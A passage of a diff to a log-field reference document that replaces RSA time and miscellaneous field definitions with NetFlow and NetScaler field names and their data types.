+*`netflow.netscaler_http_domain_name`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`netflow.netscaler_http_req_authorization`*:: + -- -This key is used to capture the timezone of the Event Time - type: keyword -- -*`rsa.time.duration_str`*:: +*`netflow.netscaler_http_req_cookie`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`netflow.netscaler_http_req_forw_fb`*:: + -- -type: keyword +type: long -- -*`rsa.time.year`*:: +*`netflow.netscaler_http_req_forw_lb`*:: + -- -type: keyword +type: long -- -*`rsa.time.recorded_time`*:: +*`netflow.netscaler_http_req_host`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`netflow.netscaler_http_req_method`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`netflow.netscaler_http_req_rcv_fb`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: long -- -*`rsa.time.expire_time`*:: +*`netflow.netscaler_http_req_rcv_lb`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: long -- -*`rsa.time.process_time`*:: +*`netflow.netscaler_http_req_referer`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`netflow.netscaler_http_req_url`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`netflow.netscaler_http_req_user_agent`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`netflow.netscaler_http_req_via`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`netflow.netscaler_http_req_xforwarded_for`*:: + -- -This key is the Time that the event was queued. - -type: date +type: keyword -- -*`rsa.time.p_time1`*:: +*`netflow.netscaler_http_res_forw_fb`*:: + -- -type: keyword +type: long -- -*`rsa.time.tzone`*:: +*`netflow.netscaler_http_res_forw_lb`*:: + -- -type: keyword +type: long -- -*`rsa.time.eventtime`*:: +*`netflow.netscaler_http_res_location`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`netflow.netscaler_http_res_rcv_fb`*:: + -- -type: keyword +type: long -- -*`rsa.time.gmttime`*:: +*`netflow.netscaler_http_res_rcv_lb`*:: + -- -type: keyword +type: long -- -*`rsa.time.p_date`*:: +*`netflow.netscaler_http_res_set_cookie`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`netflow.netscaler_http_res_set_cookie2`*:: + -- type: keyword -- -*`rsa.time.p_time`*:: +*`netflow.netscaler_http_rsp_len`*:: + -- -type: keyword +type: long -- -*`rsa.time.p_time2`*:: +*`netflow.netscaler_http_rsp_status`*:: + -- -type: keyword +type: integer -- -*`rsa.time.p_year`*:: +*`netflow.netscaler_ica_app_module_path`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`netflow.netscaler_ica_app_process_id`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - -type: keyword +type: long -- -*`rsa.time.stamp`*:: +*`netflow.netscaler_ica_application_name`*:: + -- -Deprecated key defined only in table map. - -type: date +type: keyword -- - -*`rsa.misc.action`*:: +*`netflow.netscaler_ica_application_termination_time`*:: + -- -type: keyword +type: long -- -*`rsa.misc.result`*:: +*`netflow.netscaler_ica_application_termination_type`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - -type: keyword +type: integer -- -*`rsa.misc.severity`*:: +*`netflow.netscaler_ica_channel_id1`*:: + -- -This key is used to capture the severity given the session - -type: keyword +type: long -- -*`rsa.misc.event_type`*:: +*`netflow.netscaler_ica_channel_id1_bytes`*:: + -- -This key captures the event category type as specified by the event source. - -type: keyword +type: long -- -*`rsa.misc.reference_id`*:: +*`netflow.netscaler_ica_channel_id2`*:: + -- -This key is used to capture an event id from the session directly - -type: keyword +type: long -- -*`rsa.misc.version`*:: +*`netflow.netscaler_ica_channel_id2_bytes`*:: + -- -This key captures Version of the application or OS which is generating the event. - -type: keyword +type: long -- -*`rsa.misc.disposition`*:: +*`netflow.netscaler_ica_channel_id3`*:: + -- -This key captures the The end state of an action. - -type: keyword +type: long -- -*`rsa.misc.result_code`*:: +*`netflow.netscaler_ica_channel_id3_bytes`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - -type: keyword +type: long -- -*`rsa.misc.category`*:: +*`netflow.netscaler_ica_channel_id4`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - -type: keyword +type: long -- -*`rsa.misc.obj_name`*:: +*`netflow.netscaler_ica_channel_id4_bytes`*:: + -- -This is used to capture name of object - -type: keyword +type: long -- -*`rsa.misc.obj_type`*:: +*`netflow.netscaler_ica_channel_id5`*:: + -- -This is used to capture type of object - -type: keyword +type: long -- -*`rsa.misc.event_source`*:: +*`netflow.netscaler_ica_channel_id5_bytes`*:: + -- -This key captures Source of the event that’s not a hostname - -type: keyword +type: long -- -*`rsa.misc.log_session_id`*:: +*`netflow.netscaler_ica_client_host_name`*:: + -- -This key is used to capture a sessionid from the session directly - type: keyword -- -*`rsa.misc.group`*:: +*`netflow.netscaler_ica_client_ip`*:: + -- -This key captures the Group Name value - -type: keyword +type: ip -- -*`rsa.misc.policy_name`*:: +*`netflow.netscaler_ica_client_launcher`*:: + -- -This key is used to capture the Policy Name only. - -type: keyword +type: integer -- -*`rsa.misc.rule_name`*:: +*`netflow.netscaler_ica_client_side_rto_count`*:: + -- -This key captures the Rule Name - -type: keyword +type: integer -- -*`rsa.misc.context`*:: +*`netflow.netscaler_ica_client_side_window_size`*:: + -- -This key captures Information which adds additional context to the event. - -type: keyword +type: integer -- -*`rsa.misc.change_new`*:: +*`netflow.netscaler_ica_client_type`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - -type: keyword +type: integer -- -*`rsa.misc.space`*:: +*`netflow.netscaler_ica_clientside_delay`*:: + -- -type: keyword +type: long -- -*`rsa.misc.client`*:: +*`netflow.netscaler_ica_clientside_jitter`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - -type: keyword +type: long -- -*`rsa.misc.msgIdPart1`*:: +*`netflow.netscaler_ica_clientside_packets_retransmit`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.msgIdPart2`*:: +*`netflow.netscaler_ica_clientside_rtt`*:: + -- -type: keyword +type: long -- -*`rsa.misc.change_old`*:: +*`netflow.netscaler_ica_clientside_rx_bytes`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - -type: keyword +type: long -- -*`rsa.misc.operation_id`*:: +*`netflow.netscaler_ica_clientside_srtt`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - -type: keyword +type: long -- -*`rsa.misc.event_state`*:: +*`netflow.netscaler_ica_clientside_tx_bytes`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - -type: keyword +type: long -- -*`rsa.misc.group_object`*:: +*`netflow.netscaler_ica_connection_priority`*:: + -- -This key captures a collection/grouping of entities. Specific usage - -type: keyword +type: integer -- -*`rsa.misc.node`*:: +*`netflow.netscaler_ica_device_serial_no`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - -type: keyword +type: long -- -*`rsa.misc.rule`*:: +*`netflow.netscaler_ica_domain_name`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`netflow.netscaler_ica_flags`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - -type: keyword +type: long -- -*`rsa.misc.param`*:: +*`netflow.netscaler_ica_host_delay`*:: + -- -This key is the parameters passed as part of a command or application, etc. - -type: keyword +type: long -- -*`rsa.misc.change_attrib`*:: +*`netflow.netscaler_ica_l7_client_latency`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - -type: keyword +type: long -- -*`rsa.misc.event_computer`*:: +*`netflow.netscaler_ica_l7_server_latency`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - -type: keyword +type: long -- -*`rsa.misc.reference_id1`*:: +*`netflow.netscaler_ica_launch_mechanism`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - -type: keyword +type: integer -- -*`rsa.misc.event_log`*:: +*`netflow.netscaler_ica_network_update_end_time`*:: + -- -This key captures the Name of the event log - -type: keyword +type: long -- -*`rsa.misc.OS`*:: +*`netflow.netscaler_ica_network_update_start_time`*:: + -- -This key captures the Name of the Operating System - -type: keyword +type: long -- -*`rsa.misc.terminal`*:: +*`netflow.netscaler_ica_rtt`*:: + -- -This key captures the Terminal Names only - -type: keyword +type: long -- -*`rsa.misc.msgIdPart3`*:: +*`netflow.netscaler_ica_server_name`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`netflow.netscaler_ica_server_side_rto_count`*:: + -- -This key captures Filter used to reduce result set - -type: keyword +type: integer -- -*`rsa.misc.serial_number`*:: +*`netflow.netscaler_ica_server_side_window_size`*:: + -- -This key is the Serial number associated with a physical asset. - -type: keyword +type: integer -- -*`rsa.misc.checksum`*:: +*`netflow.netscaler_ica_serverside_delay`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - -type: keyword +type: long -- -*`rsa.misc.event_user`*:: +*`netflow.netscaler_ica_serverside_jitter`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. - -type: keyword +type: long -- -*`rsa.misc.virusname`*:: +*`netflow.netscaler_ica_serverside_packets_retransmit`*:: + -- -This key captures the name of the virus - -type: keyword +type: integer -- -*`rsa.misc.content_type`*:: +*`netflow.netscaler_ica_serverside_rtt`*:: + -- -This key is used to capture Content Type only. - -type: keyword +type: long -- -*`rsa.misc.group_id`*:: +*`netflow.netscaler_ica_serverside_srtt`*:: + -- -This key captures Group ID Number (related to the group name) - -type: keyword +type: long -- -*`rsa.misc.policy_id`*:: +*`netflow.netscaler_ica_session_end_time`*:: + -- -This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise - -type: keyword +type: long -- -*`rsa.misc.vsys`*:: +*`netflow.netscaler_ica_session_guid`*:: + -- -This key captures Virtual System Name - -type: keyword +type: short -- -*`rsa.misc.connection_id`*:: +*`netflow.netscaler_ica_session_reconnects`*:: + -- -This key captures the Connection ID - -type: keyword +type: short -- -*`rsa.misc.reference_id2`*:: +*`netflow.netscaler_ica_session_setup_time`*:: + -- -This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. - -type: keyword +type: long -- -*`rsa.misc.sensor`*:: +*`netflow.netscaler_ica_session_update_begin_sec`*:: + -- -This key captures Name of the sensor. Typically used in IDS/IPS based devices - -type: keyword +type: long -- -*`rsa.misc.sig_id`*:: +*`netflow.netscaler_ica_session_update_end_sec`*:: + -- -This key captures IDS/IPS Int Signature ID - type: long -- -*`rsa.misc.port_name`*:: +*`netflow.netscaler_ica_username`*:: + -- -This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). - type: keyword -- -*`rsa.misc.rule_group`*:: +*`netflow.netscaler_license_type`*:: + -- -This key captures the Rule group name - -type: keyword +type: short -- -*`rsa.misc.risk_num`*:: +*`netflow.netscaler_main_page_core_id`*:: + -- -This key captures a Numeric Risk value - -type: double +type: long -- -*`rsa.misc.trigger_val`*:: +*`netflow.netscaler_main_page_id`*:: + -- -This key captures the Value of the trigger or threshold condition. - -type: keyword +type: long -- -*`rsa.misc.log_session_id1`*:: +*`netflow.netscaler_max_license_count`*:: + -- -This key is used to capture a Linked (Related) Session ID from the session directly - -type: keyword +type: long -- -*`rsa.misc.comp_version`*:: +*`netflow.netscaler_msi_client_cookie`*:: + -- -This key captures the Version level of a sub-component of a product. - -type: keyword +type: short -- -*`rsa.misc.content_version`*:: +*`netflow.netscaler_round_trip_time`*:: + -- -This key captures Version level of a signature or database content. - -type: keyword +type: long -- -*`rsa.misc.hardware_id`*:: +*`netflow.netscaler_server_ttfb`*:: + -- -This key is used to capture unique identifier for a device or system (NOT a Mac address) - -type: keyword +type: long -- -*`rsa.misc.risk`*:: +*`netflow.netscaler_server_ttlb`*:: + -- -This key captures the non-numeric risk value - -type: keyword +type: long -- -*`rsa.misc.event_id`*:: +*`netflow.netscaler_syslog_message`*:: + -- type: keyword -- -*`rsa.misc.reason`*:: +*`netflow.netscaler_syslog_priority`*:: + -- -type: keyword +type: short -- -*`rsa.misc.status`*:: +*`netflow.netscaler_syslog_timestamp`*:: + -- -type: keyword +type: long -- -*`rsa.misc.mail_id`*:: +*`netflow.netscaler_transaction_id`*:: + -- -This key is used to capture the mailbox id/name - -type: keyword +type: long -- -*`rsa.misc.rule_uid`*:: +*`netflow.netscaler_unknown270`*:: + -- -This key is the Unique Identifier for a rule. - -type: keyword +type: long -- -*`rsa.misc.trigger_desc`*:: +*`netflow.netscaler_unknown271`*:: + -- -This key captures the Description of the trigger or threshold condition. - -type: keyword +type: long -- -*`rsa.misc.inout`*:: +*`netflow.netscaler_unknown272`*:: + -- -type: keyword +type: long -- -*`rsa.misc.p_msgid`*:: +*`netflow.netscaler_unknown273`*:: + -- -type: keyword +type: long -- -*`rsa.misc.data_type`*:: +*`netflow.netscaler_unknown274`*:: + -- -type: keyword +type: long -- -*`rsa.misc.msgIdPart4`*:: +*`netflow.netscaler_unknown275`*:: + -- -type: keyword +type: long -- -*`rsa.misc.error`*:: +*`netflow.netscaler_unknown276`*:: + -- -This key captures All non successful Error codes or responses - -type: keyword +type: long -- -*`rsa.misc.index`*:: +*`netflow.netscaler_unknown277`*:: + -- -type: keyword +type: long -- -*`rsa.misc.listnum`*:: +*`netflow.netscaler_unknown278`*:: + -- -This key is used to capture listname or listnumber, primarily for collecting access-list - -type: keyword +type: long -- -*`rsa.misc.ntype`*:: +*`netflow.netscaler_unknown279`*:: + -- -type: keyword +type: long -- -*`rsa.misc.observed_val`*:: +*`netflow.netscaler_unknown280`*:: + -- -This key captures the Value observed (from the perspective of the device generating the log). - -type: keyword +type: long -- -*`rsa.misc.policy_value`*:: +*`netflow.netscaler_unknown281`*:: + -- -This key captures the contents of the policy. This contains details about the policy - -type: keyword +type: long -- -*`rsa.misc.pool_name`*:: +*`netflow.netscaler_unknown282`*:: + -- -This key captures the name of a resource pool - -type: keyword +type: long -- -*`rsa.misc.rule_template`*:: +*`netflow.netscaler_unknown283`*:: + -- -A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template - -type: keyword +type: long -- -*`rsa.misc.count`*:: +*`netflow.netscaler_unknown284`*:: + -- -type: keyword +type: long -- -*`rsa.misc.number`*:: +*`netflow.netscaler_unknown285`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sigcat`*:: +*`netflow.netscaler_unknown286`*:: + -- -type: keyword +type: long -- -*`rsa.misc.type`*:: +*`netflow.netscaler_unknown287`*:: + -- -type: keyword +type: long -- -*`rsa.misc.comments`*:: +*`netflow.netscaler_unknown288`*:: + -- -Comment information provided in the log message - -type: keyword +type: long -- -*`rsa.misc.doc_number`*:: +*`netflow.netscaler_unknown289`*:: + -- -This key captures File Identification number - type: long -- -*`rsa.misc.expected_val`*:: +*`netflow.netscaler_unknown290`*:: + -- -This key captures the Value expected (from the perspective of the device generating the log). - -type: keyword +type: long -- -*`rsa.misc.job_num`*:: +*`netflow.netscaler_unknown291`*:: + -- -This key captures the Job Number - -type: keyword +type: long -- -*`rsa.misc.spi_dst`*:: +*`netflow.netscaler_unknown292`*:: + -- -Destination SPI Index - -type: keyword +type: long -- -*`rsa.misc.spi_src`*:: +*`netflow.netscaler_unknown293`*:: + -- -Source SPI Index - -type: keyword +type: long -- -*`rsa.misc.code`*:: +*`netflow.netscaler_unknown294`*:: + -- -type: keyword +type: long -- -*`rsa.misc.agent_id`*:: +*`netflow.netscaler_unknown295`*:: + -- -This key is used to capture agent id - -type: keyword +type: long -- -*`rsa.misc.message_body`*:: +*`netflow.netscaler_unknown296`*:: + -- -This key captures the The contents of the message body. - -type: keyword +type: long -- -*`rsa.misc.phone`*:: +*`netflow.netscaler_unknown297`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sig_id_str`*:: +*`netflow.netscaler_unknown298`*:: + -- -This key captures a string object of the sigid variable. - -type: keyword +type: long -- -*`rsa.misc.cmd`*:: +*`netflow.netscaler_unknown299`*:: + -- -type: keyword +type: long -- -*`rsa.misc.misc`*:: +*`netflow.netscaler_unknown300`*:: + -- -type: keyword +type: long -- -*`rsa.misc.name`*:: +*`netflow.netscaler_unknown301`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cpu`*:: +*`netflow.netscaler_unknown302`*:: + -- -This key is the CPU time used in the execution of the event being recorded. - type: long -- -*`rsa.misc.event_desc`*:: +*`netflow.netscaler_unknown303`*:: + -- -This key is used to capture a description of an event available directly or inferred - -type: keyword +type: long -- -*`rsa.misc.sig_id1`*:: +*`netflow.netscaler_unknown304`*:: + -- -This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id - type: long -- -*`rsa.misc.im_buddyid`*:: +*`netflow.netscaler_unknown305`*:: + -- -type: keyword +type: long -- -*`rsa.misc.im_client`*:: +*`netflow.netscaler_unknown306`*:: + -- -type: keyword +type: long -- -*`rsa.misc.im_userid`*:: +*`netflow.netscaler_unknown307`*:: + -- -type: keyword +type: long -- -*`rsa.misc.pid`*:: +*`netflow.netscaler_unknown308`*:: + -- -type: keyword +type: long -- -*`rsa.misc.priority`*:: +*`netflow.netscaler_unknown309`*:: + -- -type: keyword +type: long -- -*`rsa.misc.context_subject`*:: +*`netflow.netscaler_unknown310`*:: + -- -This key is to be used in an audit context where the subject is the object being identified - -type: keyword +type: long -- -*`rsa.misc.context_target`*:: +*`netflow.netscaler_unknown311`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cve`*:: +*`netflow.netscaler_unknown312`*:: + -- -This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. - -type: keyword +type: long -- -*`rsa.misc.fcatnum`*:: +*`netflow.netscaler_unknown313`*:: + -- -This key captures Filter Category Number. Legacy Usage - -type: keyword +type: long -- -*`rsa.misc.library`*:: +*`netflow.netscaler_unknown314`*:: + -- -This key is used to capture library information in mainframe devices - -type: keyword +type: long -- -*`rsa.misc.parent_node`*:: +*`netflow.netscaler_unknown315`*:: + -- -This key captures the Parent Node Name. Must be related to node variable. - -type: keyword +type: long -- -*`rsa.misc.risk_info`*:: +*`netflow.netscaler_unknown316`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.tcp_flags`*:: +*`netflow.netscaler_unknown317`*:: + -- -This key is captures the TCP flags set in any packet of session - type: long -- -*`rsa.misc.tos`*:: +*`netflow.netscaler_unknown318`*:: + -- -This key describes the type of service - type: long -- -*`rsa.misc.vm_target`*:: +*`netflow.netscaler_unknown319`*:: + -- -VMWare Target **VMWARE** only varaible. - type: keyword -- -*`rsa.misc.workspace`*:: +*`netflow.netscaler_unknown320`*:: + -- -This key captures Workspace Description - -type: keyword +type: integer -- -*`rsa.misc.command`*:: +*`netflow.netscaler_unknown321`*:: + -- -type: keyword +type: long -- -*`rsa.misc.event_category`*:: +*`netflow.netscaler_unknown322`*:: + -- -type: keyword +type: long -- -*`rsa.misc.facilityname`*:: +*`netflow.netscaler_unknown323`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.forensic_info`*:: +*`netflow.netscaler_unknown324`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.jobname`*:: +*`netflow.netscaler_unknown325`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.mode`*:: +*`netflow.netscaler_unknown326`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.policy`*:: +*`netflow.netscaler_unknown327`*:: + -- -type: keyword +type: long -- -*`rsa.misc.policy_waiver`*:: +*`netflow.netscaler_unknown328`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.second`*:: +*`netflow.netscaler_unknown329`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.space1`*:: +*`netflow.netscaler_unknown330`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.subcategory`*:: +*`netflow.netscaler_unknown331`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.tbdstr2`*:: +*`netflow.netscaler_unknown332`*:: + -- -type: keyword +type: long -- -*`rsa.misc.alert_id`*:: +*`netflow.netscaler_unknown333`*:: + -- -Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - type: keyword -- -*`rsa.misc.checksum_dst`*:: +*`netflow.netscaler_unknown334`*:: + -- -This key is used to capture the checksum or hash of the the target entity such as a process or file. - type: keyword -- -*`rsa.misc.checksum_src`*:: +*`netflow.netscaler_unknown335`*:: + -- -This key is used to capture the checksum or hash of the source entity such as a file or process. - -type: keyword +type: long -- -*`rsa.misc.fresult`*:: +*`netflow.netscaler_unknown336`*:: + -- -This key captures the Filter Result - type: long -- -*`rsa.misc.payload_dst`*:: +*`netflow.netscaler_unknown337`*:: + -- -This key is used to capture destination payload - -type: keyword +type: long -- -*`rsa.misc.payload_src`*:: +*`netflow.netscaler_unknown338`*:: + -- -This key is used to capture source payload - -type: keyword +type: long -- -*`rsa.misc.pool_id`*:: +*`netflow.netscaler_unknown339`*:: + -- -This key captures the identifier (typically numeric field) of a resource pool - -type: keyword +type: long -- -*`rsa.misc.process_id_val`*:: +*`netflow.netscaler_unknown340`*:: + -- -This key is a failure key for Process ID when it is not an integer value - -type: keyword +type: long -- -*`rsa.misc.risk_num_comm`*:: +*`netflow.netscaler_unknown341`*:: + -- -This key captures Risk Number Community - -type: double +type: long -- -*`rsa.misc.risk_num_next`*:: +*`netflow.netscaler_unknown342`*:: + -- -This key captures Risk Number NextGen - -type: double +type: long -- -*`rsa.misc.risk_num_sand`*:: +*`netflow.netscaler_unknown343`*:: + -- -This key captures Risk Number SandBox - -type: double +type: long -- -*`rsa.misc.risk_num_static`*:: +*`netflow.netscaler_unknown344`*:: + -- -This key captures Risk Number Static - -type: double +type: long -- -*`rsa.misc.risk_suspicious`*:: +*`netflow.netscaler_unknown345`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - -type: keyword +type: long -- -*`rsa.misc.risk_warning`*:: +*`netflow.netscaler_unknown346`*:: + -- -Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) - -type: keyword +type: long -- -*`rsa.misc.snmp_oid`*:: +*`netflow.netscaler_unknown347`*:: + -- -SNMP Object Identifier - -type: keyword +type: long -- -*`rsa.misc.sql`*:: +*`netflow.netscaler_unknown348`*:: + -- -This key captures the SQL query - -type: keyword +type: integer -- -*`rsa.misc.vuln_ref`*:: +*`netflow.netscaler_unknown349`*:: + -- -This key captures the Vulnerability Reference details - type: keyword -- -*`rsa.misc.acl_id`*:: +*`netflow.netscaler_unknown350`*:: + -- type: keyword -- -*`rsa.misc.acl_op`*:: +*`netflow.netscaler_unknown351`*:: + -- type: keyword -- -*`rsa.misc.acl_pos`*:: +*`netflow.netscaler_unknown352`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.acl_table`*:: +*`netflow.netscaler_unknown353`*:: + -- -type: keyword +type: long -- -*`rsa.misc.admin`*:: +*`netflow.netscaler_unknown354`*:: + -- -type: keyword +type: long -- -*`rsa.misc.alarm_id`*:: +*`netflow.netscaler_unknown355`*:: + -- -type: keyword +type: long -- -*`rsa.misc.alarmname`*:: +*`netflow.netscaler_unknown356`*:: + -- -type: keyword +type: long -- -*`rsa.misc.app_id`*:: +*`netflow.netscaler_unknown357`*:: + -- -type: keyword +type: long -- -*`rsa.misc.audit`*:: +*`netflow.netscaler_unknown363`*:: + -- -type: keyword +type: short -- -*`rsa.misc.audit_object`*:: +*`netflow.netscaler_unknown383`*:: + -- -type: keyword +type: short -- -*`rsa.misc.auditdata`*:: +*`netflow.netscaler_unknown391`*:: + -- -type: keyword +type: long -- -*`rsa.misc.benchmark`*:: +*`netflow.netscaler_unknown398`*:: + -- -type: keyword +type: long -- -*`rsa.misc.bypass`*:: +*`netflow.netscaler_unknown404`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cache`*:: +*`netflow.netscaler_unknown405`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cache_hit`*:: +*`netflow.netscaler_unknown427`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cefversion`*:: +*`netflow.netscaler_unknown429`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cfg_attr`*:: +*`netflow.netscaler_unknown432`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cfg_obj`*:: +*`netflow.netscaler_unknown433`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cfg_path`*:: +*`netflow.netscaler_unknown453`*:: + -- -type: keyword +type: long -- -*`rsa.misc.changes`*:: +*`netflow.netscaler_unknown465`*:: + -- -type: keyword +type: long -- -*`rsa.misc.client_ip`*:: +*`netflow.new_connection_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.clustermembers`*:: +*`netflow.next_header_ipv6`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_acttimeout`*:: +*`netflow.non_empty_packet_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_asn_src`*:: +*`netflow.not_sent_flow_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_bgpv4nxthop`*:: +*`netflow.not_sent_layer2_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_ctr_dst_code`*:: +*`netflow.not_sent_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_dst_tos`*:: +*`netflow.not_sent_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_dst_vlan`*:: +*`netflow.observation_domain_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_engine_id`*:: +*`netflow.observation_domain_name`*:: + -- type: keyword -- -*`rsa.misc.cn_engine_type`*:: +*`netflow.observation_point_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_f_switch`*:: +*`netflow.observation_point_type`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_flowsampid`*:: +*`netflow.observation_time_microseconds`*:: + -- -type: keyword +type: date -- -*`rsa.misc.cn_flowsampintv`*:: +*`netflow.observation_time_milliseconds`*:: + -- -type: keyword +type: date -- -*`rsa.misc.cn_flowsampmode`*:: +*`netflow.observation_time_nanoseconds`*:: + -- -type: keyword +type: date -- -*`rsa.misc.cn_inacttimeout`*:: +*`netflow.observation_time_seconds`*:: + -- -type: keyword +type: date -- -*`rsa.misc.cn_inpermbyts`*:: +*`netflow.observed_flow_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_inpermpckts`*:: +*`netflow.octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_invalid`*:: +*`netflow.octet_delta_sum_of_squares`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`netflow.octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_ipv4_ident`*:: +*`netflow.octet_total_sum_of_squares`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_l_switch`*:: +*`netflow.opaque_octets`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_log_did`*:: +*`netflow.original_exporter_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cn_log_rid`*:: +*`netflow.original_exporter_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cn_max_ttl`*:: +*`netflow.original_flows_completed`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_maxpcktlen`*:: +*`netflow.original_flows_initiated`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_min_ttl`*:: +*`netflow.original_flows_present`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_minpcktlen`*:: +*`netflow.original_observation_domain_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`netflow.os_finger_print`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_10`*:: +*`netflow.os_name`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`netflow.os_version`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`netflow.p2p_technology`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`netflow.packet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`netflow.packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`netflow.padding_octets`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`netflow.payload`*:: + -- type: keyword -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`netflow.payload_entropy`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`netflow.payload_length_ipv6`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_mplstoplabel`*:: +*`netflow.policy_qos_classification_hierarchy`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mplstoplabip`*:: +*`netflow.policy_qos_queue_index`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`netflow.policy_qos_queuedrops`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`netflow.policy_qos_queueindex`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_muligmptype`*:: +*`netflow.port_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_sampalgo`*:: +*`netflow.port_range_end`*:: + -- 